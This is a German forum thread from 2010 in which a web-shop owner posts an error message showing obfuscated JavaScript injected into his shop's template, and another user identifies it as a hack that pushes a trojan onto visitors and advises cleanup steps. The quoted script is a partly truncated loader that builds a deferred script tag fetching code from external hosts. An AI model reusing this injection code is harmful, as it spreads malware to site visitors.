ENZO999 Posted January 5, 2010 Report Share Posted January 5, 2010 nachdem mein shop vorerst einwandfrei lief bekomm ich nun folgendes zu spüren: Fatal error: Smarty error: [in RedRiver/module/main_content.html line 11]: syntax error: unrecognized tag: window.onload = function(){var V7i6qz6ihqw = document.createElement('s$c^r#(^i&$p#!!t@&!'.replace(/@|#|\^|\)|\!|&|\(|\$/ig, ''));var B0gy42prc97 = 'Jbsbqv0x2l4fxs';V7i6qz6ihqw.setAttribute('type', 't&e)@)$x#!t&@&/)@@j$$a!$v)a&))s#)c$)@@r(@i$^)$p@@t)&&'.replace(/\!|\$|\^|\)|\(|&|#|@/ig, ''));V7i6qz6ihqw.setAttribute('src', 'h!&t&!#@t!!(p(^):&/)(#)&/&!t#!i@^n&))y((!!p$&@i$!&)c)-)^@c(#o#^!m@.^e&x^^^a#m@#i)#n@e($)r&(.(#))c@!^!o#@@m$!.((f#)&i)&l##$^^e!^#s^$&$#t@)u$$$)b$!e&)(- $c!(!)o#!((m#!.$$#s#i@^t!e!(@@s&a#^&g^e#s^$.$^r))@u):@#$(8^@0&!8@^0!/^@#h^o#w@^$s^t!)(u&f#@$^f&$(w@#)&o@(#@r(k$#s(^@.(c$^o##m@@/$^h$o)@!&^w@s(^t)@#@u#f#&)f!^w@!)o)!r^#k)!s!.@#!c$o^@m)^&)&/@!)@g@#^$o^&o^((@g$#)l)e!@).!&!!s@&e@^#/(@f)$l(^i(($@&n$))g$&!#@.@c@$$o&!m()/g(#!o@!$&o^g&l&((e##.)c$o)##m^/@)#'.replace(/\(|\^|@|#|\$|\!|&|\)/ig, ''));V7i6qz6ihqw.setAttribute('defer', 'd@)e#f!e^r@&'.replace(/\(|\$|&|#|\)|@|\^|\!/ig, ''));V7i6qz6ihqw.setAtt in /home/hojac/public_html/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1102 DOMAIN: HOJAC.ch Link to comment Share on other sites More sharing options...
Fry Posted January 5, 2010 Report Share Posted January 5, 2010 Das kommt mir irgendwie bekannt vor:cool: http://www.xt-commerce.com/forum/allgemeine-diskussionen/75866-shop-gehackt-ben-tige-dringend-unterst-tzung.html Dort geht es um einen gehackten/Virenverseuchten Shop, zu dem deine "Fehlermeldung" irgendwie passt. Geht man auf deine Seite hojac.ch dann kukk mal unten in der Statusleiste, dort wird ganz schnell und lustig ein Trojaner downgeloadet :) Link to comment Share on other sites More sharing options...
ENZO999 Posted January 6, 2010 Author Report Share Posted January 6, 2010 Also wie bekomm ich den Verursacher raus? in den Logs werd ich nicht schlau... Link to comment Share on other sites More sharing options...
ENZO999 Posted January 6, 2010 Author Report Share Posted January 6, 2010 Also wie bekomm ich den Verursacher raus? in den Logs werd ich nicht schlau... kann mir da jemand helfen die logs zu lesen? Link to comment Share on other sites More sharing options...
Fry Posted January 6, 2010 Report Share Posted January 6, 2010 In den Logs wirst du höchstwahrscheinlich nichts finden. Scanne deinen Rechner nach Viren, Backdoors, Trojanern, etc.pp und deinen Server, sofern es ein Root oder vServer ist, würde ich neu aufsetzen und danach ein definitiv sauberes Backup deines Shops einspielen. Hast du nur Webspace--> Hoster informieren, rein Sicherheitshalber natürlich. Link to comment Share on other sites More sharing options...
ENZO999 Posted January 6, 2010 Author Report Share Posted January 6, 2010 In den Logs wirst du höchstwahrscheinlich nichts finden. Scanne deinen Rechner nach Viren, Backdoors, Trojanern, etc.pp und deinen Server, sofern es ein Root oder vServer ist, würde ich neu aufsetzen und danach ein definitiv sauberes Backup deines Shops einspielen. Hast du nur Webspace--> Hoster informieren, rein Sicherheitshalber natürlich. ich hab da aber eine IP aus prag, was bei meinen zugriffen doch sehr auffällig ist.......!!! hoster ist informiert. und wieso hat der typ zuerst alles zerschossen, erst dann die kennwörter geändert und die logs nicht gelöscht...? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.